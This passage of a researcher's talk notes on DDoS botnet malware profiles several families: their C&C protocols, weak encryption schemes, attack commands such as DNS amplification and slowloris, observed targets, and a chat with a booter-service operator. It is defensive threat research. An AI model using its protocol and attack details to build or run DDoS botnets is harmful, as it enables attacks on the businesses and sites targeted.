  44. And here is the 1028 byte versionWhat they added in this version is the ability to specify up to 18 DNS serversWhich allows for some DNS attacks
  45. Here are the full set of attack commands, again mostly comprised of the basic suiteIn addition, there are 2 DNS related attacks – An A query flood on a server and a DNS amplification attack using up to 18 open DNS resolversThis one is very interesting to me as it was the first botnet in the wild that I’ve seen to support a distinc DNS amplification attack command.That’s not to say that DNS amplification hasn’t been around forever.. It has, but mostly in the form of standalone scripts and a list of open DNS resolvers
  46. I’ve been tracking close to 170 Uutab C&Cs since May and had only seen 1 attack come through. It was an attack on an IP in China.So I was thinking that maybe there was a bug in monitoring code (very possible), or that these C&Cs just die really quickly and the samples were old by the time they got to mcorral., or maybe they’re doing some kind of geoblocking/tor blocking.But last night interestingly enough, doing one last check before giving my talk this morning, I saw a second attack come through. On a Chinese mortgage/loan company.Very timely So my new theory is that Uutab campaigns are possibly using very small and short attack windows. @NO_UPDATEpython src/get_lat_long_by_tag.py uutab > uutab.csv
  47. I’m still monitoring this family and it was last seen Circa February 2014.@UPDATE
  48. Next up, “Give em the boot” or Trojan.AyabotTo give credit, the Sonicwall folks and the myexperimentswithmalware blog released their analysis on Ayabot first, but I just failed to find it at the time. These slides are based on my own research though.
  49. Aya is an acronym for a hacker (or possibly a hacking group) known as AreYouAreDo.
  50. First seen circa May 2013
  51. Another Russian botSource: http://en.wikipedia.org/wiki/File:Russian_Federation_(orthographic_projection).svg
  52. And of course it’s written in Delphi
  53. Instead ofselling a malware or botnetAreYouAreDo uses the Ayabot botnet to support a booter site and sells a DDoSing serviceThis is a translated screenshot of the booter site showing its marketing and pricingIt’s interesting to note that they also sell/resell an anti-DDoSing service (the last section of the black box)
  54. Ayabot uses a multi staged C&C protocol over HTTPThe first stage is an optional C&C redirection featureYou sould be able to see the redirect here in this Wireshark screenshotBut it looks like they are trying to foil us with some secure base64 encoding
  55. It actually turns out to be triple-base64 ! So, very secure indeed.Once decoded, we can see the second stage C&C URL
  56. The second stage is a ping
  57. This is the cleaned up version of the ping query and responseIt returns a hash.The hash is checked against a hardcoded value in the binary, this seems to be an client side authentication mechanism or checksum
  58. Next up is the bot registration
  59. Again, the query and response cleaned up.The registration is a standard phone home with computer name, CPU, memory, Windows version, etc.The response is an id number
  60. And finally, command polling
  61. Here it is cleaned up.The query sends the id it got from registration, bot name, bot version, and an unknown fieldAnd the bot command is returned.
  62. The attack types are again from the basic suite.I assure you that there are plenty of DDoS bots that implement more than just the basic suite of attacks. We should get to one here in a few minutes…
  63. These are the C&Cs I’m tracking, kind of all over the place. I believe these are a mixture of bullet proof hosted sites and hacked sites as some of the C&Cs have been alive and active since the start and some have died quicklyI would say the former sites use the redirection optionAnd they redirect to the short lived, hacked sites that provide the bot commands@NO_UPDATEpython src/get_at_long_by_tag.py ayabot > ayabot.csv
  64. Here are the attack commands seen from them.@NO_UPDATE\o ayabotselect cmd from ddos_commands where cc_channel=’ayabot’;\ocut -d '|' -f 1 ayabot | sort | uniq -c | sort -nr
  65. The countries targeted based on Geo IP.Russia and Romania are on top@NO_UPDATEselect target_cc, count(*) from ddos_commands where cc_channel='ayabot' group by target_cc order by count(*) desc;
  66. And some of the observed targets.Picture blogNewspaperNews blogPizza/Sushi restaurantChildren’s clothing manufacturerBuilding materials companyAnti corruption website@NO_UPDATEselect target_host, count(*) from ddos_commands where cc_channel='blackrev' group by target_host order by count(*) desc;
  67. While googling around for this bot and campaign, I stumbled across this link which was a chat system.Surprisingly someone joined and I was able to have a impromptu interview with AreYouAreDo.Vasilis Zebedee was the name that the TOR browser filled in for me, so that’s me typing.
  68. Here are some snippets that I found interesting:On distribtionBased on this, I’m guessing he does not distribute via exploit kitsOn advertisingGoogle adwords I assumeOn how he got startedOn how much money he makesOn hacking
  69. At this point he wanted to start trading for information. He wanted me to provide him with other Russian botnet C&Cs so that he could take them over… because you know he’s elite.This also makes sense why he implements a client side authentication into Ayabot, maybe to prevent some from taking over his botnet.
  70. On customers and attacks – I suppose this goes along with the corrupt countries he mentionedOn handling money – unsure what gamesAnd I believe Russia just recently banned bitcoin…And finally on Anti-DDoS companiesHe told me about 1 company which I looked up. They do look like a legit anti-DDoS company, but who knows if they really sell a booter service as well.At this point he wanted to start trading for information. He wanted me to provide him with other Russian botnet C&Cs so that he could take them over… because you know he’s elite.Also makes sense why he implements a client side authentication in Ayabot, to prevent someone taking over his bot.
  71. Attack-wise, this this botnet has slowed down a bit recently, but I continue to monitor this bot and it was last seen circa February 2014
  72. My fourth bot is Trojan.FerretI wrote a blog on this family a few weeks ago, but wanted to talk about it here to provide some updates.
  73. This was first seen circa November 2013.It came on my radar from this tweet by @malpush.
  74. Russian in origin
  75. And of course, Delphi.
  76. This is Ferret bot’s panel login.The ferret icon and theme cracked me up.It also reminded me of a French DDoS bot I was trying to track down…
  77. Called Angry Cat.but, I never was able to find a binary sample of Angry Cat, so Ferret was a suitable replacement If anyone does have a sample of Angry Cat, I’d love a copy.
  78. Here is the statistics page. Based on some comments from a thread on the kernelmode forum, the Ferret panel is based on another bot’s panel called N0pe… I took a quick look at N0pe and it does look like the panel is similar, but the bot itself differs from Ferret, I believe it was written in C# and not DelphiThis campaign has close to 2500 bots, so not large, but not small either.
  79. Here’s a sampling of the bot list.As you can see from the flag icons, it’s gotten around…
  80. Ferret is actively being development.Since it was discovered I’ve seen 4 versions.
  81. It’s actively being distributed by the Trojan Downloader networksIn early February I started seeing an Andromeda botnet dropping it. On a cursory look this came was also dropping Dirtjumper samples, so maybe a DDoS focused trojan dropper network…I haven’t had the opportunity to explore this relationship further, so if anybody is currently tracking Andromeda, I’d love to chat
  82. Ferret uses 2 encryption routines, one for C&C communication and one for stringsThis Python function decrypts the C&C comms and it’s a combination of base64 and XOR.Over the course ofdevelopment they’ve continue to use the same XOR key, the number 8. So that’s been thoughtful of them.
  83. This Python function decrypts the strings and it is again a combination of base64 and XORLikewise, over the development, they used the following 2 keys for strings encryption.
  84. There is an exception to their key reuse rule. The key used to encode the C&C host details has been uniqueHere is a sampling from a handful of samplesBased on the format it is likely generated from some sort of base64 based builder or keygen.
  85. Here’s what the C&C phone home looks like.It is an HTTP POST based C&C.The POST data contains standard phone home data. The “m” field contains the message type, and 0 is for “phone home”.
  86. An interesting feature of Ferret is if it detects it is running in a VM, being debugged, or messed with in other ways, it generates a fake phone home.The POST content will be legit, but the host, URL and User-Agent will be fake.The fake domains may make for a interesting sinkhole opportunity, but I haven’t explored that yet.
  87. Speaking ofUser-Agents, it is used as some form of an authentication method.As can be seen here, the phone home response is the User-Agent sent in the original request.
  88. Here is a sampling of User-AgentsMozilla Gecko is pretty consistent and further indicates there is likely a builder in play or they just like the Gecko UA
  89. Message type 1 is for command polling
  90. This is what a command looks like. The fields are delimited by ‘*’s and indicate port, timing, etc.
  91. Attack types are again from the basic suite.HTTP floodsUDP floodsTCP floods
  92. These are the C&C locations I’m tracking.
  93. Most of the attacks I’ve seen from these C&Cs have been HTTP floods. For awhile it was just httpfloods, but recently started seeing a udp and tcp flood in the mix@NO_UPDATEmalware=> \o ferretmalware=> select cmd from ddos_commands where cc_channel=’ferret';malware=> \ocut -d “*" -f 1 ferret | sort | uniq -c | sort -nr
  94. Targeted countries based on geo IP: Germany and Russia are on top@NO_UPDATE
  95. Here’s a sampling of targets.Here we have:Vice President of Panama – Juan Carlos VarelaElectronics companyWedding dress storeWatch storeReal estate sitesPolitical news blogsMoney exchangerCarding forumGaming site
  96. Ferret continues to be active, I last saw it on February 15, 2014.@UPDATE
  97. Trojan.UGSec is the obligatory Hack forums botWhile a lot of researchers think themselves as above researching Hack Forum malware,I find it interesting because:There is a lot of activity thereIt does occasionally produce significant threats, for example, I’d argue Betabot is an exampleAnd Malware in general tends to trickle down there
  98. First seen mid 2013.
  99. From the UShttp://en.wikipedia.org/wiki/File:USA_orthographic.svg
  100. And it’s written in C++
  101. Here is the Hack Forums advert
  102. Pretty professional looking…
  103. And the pricing.30-50 dollars.I didn’t look very closely, but there might be an interesting bitcoin money trail from UGSec’s author. The sales thread had a lot of “vouches” and likely many purchases.
  104. Speaking of the author, he goes by the handle “Bionic”He’s very active on Hack Forums, 1100+ posts as can be seen in his profile
  105. As is sort of par for the course for Hack Forums though, he practices poor OPSEC and I was able to track him down in a few minutesThat’s another nice thing about HF, it tends to be fairly easy to find malware/campaign attribution details.
  106. The main reason I wanted to profile this bot, is to show that in the DDoS malware sub-culture, IRC is still very common.Even in 2014.
  107. Attack types.Chargen here does not refer to the port 19 service, but just a payload of random characters.
  108. The samp command is interesting because instead of just being a TCP or UDP flood on the gaming port it actually tries to implement the Grand Theft Auto protocol
  109. I haven’t seen much from this bot since August.
  110. My second to last malware is Trojan.Chimera
  111. First seen in July of last year
  112. I believe it is Bulgarian in originhttp://upload.wikimedia.org/wikipedia/commons/thumb/e/e9/EU-Bulgaria.svg/500px-EU-Bulgaria.svg.png
  113. This is based on the language detect by Google translate on Chimera’s login screen.This translates to “authorization”.
  114. It is written in C++
  115. Naming wise, its name comes from the embedded program database pathname.These PDB strings are great. While I know some folks/vendors disagree, I prefer to name malware their given name when possible. It makes classifying and comparing research far easier
  116. Some of Chimera’s source code, or at least what it was based on, can be found on pastebin. This paste just shows some skeleton code though.This was posted circa November 2013.
  117. Like a few of the other bots, Chimera uses an optional C&C redirection feature. This time using ICQ. Here is an example profile with the second stage C&C URL embedded in the About me field.
  118. It uses a standard HTTP GET based command poll.
  119. And this is what a response looks. Which is a very nicely detailed XML-like file.The text outside of the tags are documentation notes that aren’t parsed in the bot, but helpful nonetheless
  120. Here are the attack types. You’ll note that this bot has an attack from the Layer 7 suite, as promised earlier ;)A nice slowloris attack
  121. I’m tracking just a handful of C&CsTo be honest, I have just recently started monitoring Chimera, so I don’t have too much data yet.
  122. So far I’ve only seen slowloris attacks.
  123. The attacks have been against a few targets in the uSselect target_cc,count(*) from ddos_commands where cc_channel='chimera' group by target_cc;
  124. And here’s they are.Most of the attacks have been against this porn siteselect target_host,count(*) from ddos_commands where cc_channel='chimera' group by target_host;
  125. Chimera is still somewhat active. I last saw it in February
  126. As I mentioned earlier, mcorral bubbles up potentially new and interesting DDoS malware samples for further human analysis.Sometimes the automatic heuristics get it wrong and a sample turns out to be more than DDoS
  127. Usually a strings hit like the above that isn’t already classified as an existing malware family is a good indicator of a new DDoS bot
  128. But in this case it turned out to be a new (to me and my network of researchers at least) Chinese RAT with no DDoS capabilities.I’ve dubbed it as Zuguo and even though it’s not DDoS related I wanted to take a few slides to present my research to see if anyone here at DCC was familiar with itSIMPLE_DDOS turned out to be the C&C communications crypto key.
  129. Zuguo uses a multi staged C&C protocol.The first stage is an optional redirection where it looks for URLs on a webpage tagged with a “zuguo” sentinel.If found, it strips this part and connects to the host/port over a persistent TCP connection.So far, I’ve only found 2 of these redirects, both have been sina.com.cn blogs, and both pointing back at the same IP.And I’ve only be able to track down 1 second stage C&C, this 222 IP
  130. The second stage C&C is encrypted with Blowfish using the SIMPLE_DDOS key and LZO compressionAnd once decrypted, the phone home is fairly standard.
  131. The last 4 fields of the Phone home come from Zuguo’s configuration which is stored in the registry.They are the Remark, Group, PassWord, and Version valuesThis screenshot shows the complete configuration. The base64 encoded Config value contains the stage 1 and stage 2 C&C addresses.
  132. Pivoting from this solo stage 2 C&C IP got me to Trojan.DrAgOn.Here’s what DrAgOn looks like on the wire.
  133. It may look familiar to some of you, as it is a Gh0st RAT variant.It uses the standard Gh0st RAT C&C binstruct protocol with zlib compression.Here is some quick Python that cleans it some.
  134. This is what it looks like decompressed.
  135. Pivoting from Trojan.DrAgOn got me to FireEye’sSunshop campaign
  136. Another link between Zuguo and Sunshop is the use of signed binaries.Here’s Zuguo’s valid certificate issued to a company I can’t pronounceWhile this certificate wasn’t listed in FireEye’s report on Sunshop, they did indicate that using signed binaries is one of Sunshop’s MOsAnd that’s where my trail got more or less cold. Hoping someone has some further insight on either Zuguo or DrAgOn and if you do, please reach out.
  137. Finishing up, these are some personal trend and takeaway thoughts.Mostly based on empirical evidence.
  138. This is a breakdown of languages we see in DDoS malwareRoughly from most to leastAs mentioned a few times in this talk, Delphi usually means RussiansBrobot put PHP on the DDoS malware mapBut pastebin and other similar sites are flooded with various Perl, PHP, and Python DDoS bot scripts.Java isn’t particularly popular in the DDoS world, my first run in was actually a few weeks ago trying to tracking down Kaspersky’s un-named Trojan.jbot variant they blogged about at the end of January
  139. As an aside on Visual basicReversing it sucks and I hate it.If you’ve reversed VB, I trust you feel my pain
  140. This is a review of the C&C types we seeI think I covered most of these with the bots presented.Unfortunately, I don’t have stats on what the distribution among these are, but if I had to guess:HTTP: 40%Binstruct: 20%IRC: 20%ASCII: 20%
  141. These are the types of crypto we see.In general, DDoS malware does not use strong crypto.Again, I don’t have stats, but XOR based obfuscation is definitely the most common and can almost be assumed to be the default
  142. While I think most of the bots I presented on in this talk implemented attacks from the basic suite of DDoS attacksI did want to show that the more advanced attacks are used in wildThis is a chart from our monitoring system across all monitored DDoS botnet families, showing (manually normalized) attack command dataAs can be seen, Slowloris, Rudy, etc. are indeed used in the wild, but albeit not as much as the generic HTTP floods.The “Other” categoryincludes unknown commands, other IP protocols, combo attacks, and “smart” (redirect following/cookie parsing) HTTP attacks that try to bypass some anti-ddos countermeasures.
  143. Some final miscellaneous thoughts on DDoS malware:It’s a copy and paste culture. A lot of copying and pasting going on, especially in the Chinese variants. This can make it extremely difficult to categorize some families. I have a theory that Chinese computer science programs require students to create their own Gh0st RAT variant as a senior project or something.Lots of broken attack implementations. For example, most implementations of slowloris aren’t slow at all and turn into a normal HTTP floodI feel like a lot of the bot families try to implement too many attacks. It’s not uncommon to see multiple UDP floods, multiple TCP floods, etc. where 1 of each would likely do.DNS amplification are slowly making their way into DDoS malware. As mentioned earlier, most DNS amplification attacks are executed with a standalone script and a list of open resolvers.With it’s current popularity, I assume we’ll start see the same integration with NTP amplification.This reminds me of a comment a collegue, Jeff Edwards, made. When the Slowloris and Apache Killer research and proof of concept code become public, there was definitely a noticeable delay before we started seeing those attack implemented in botnet malware. I think we’re seeing something similar here with the amplification attacks, but instead of new research, the catalyst is how much press these attacks are creating…
  144. DNS amplification attacks are slowly making their way into DDoS botnets. As mentioned earlier, most DNS amplification attacks don’t really need the support of a botnet but we’re slowly seeing them integrated.With it’s current popularity, I assume we’ll start see the same integration with NTP amplification.The above 2 points remind me of a comment a collegue, Jeff Edwards, made. When the Slowloris and Apache Killer research and proof of concept code became public, there was definitely a noticeable delay before we started seeing those attacks being implemented in botnets. Even when they started implementing them, they were fairly broken and didn’t really work. I think we’re seeing something similar here with the amplification attacks, but instead of new research, the catalyst is how much press these attacks can generate
  145. And that’s what I have for you. If you have any questions, comments, or feedback, I’m available.Thanks much for listening!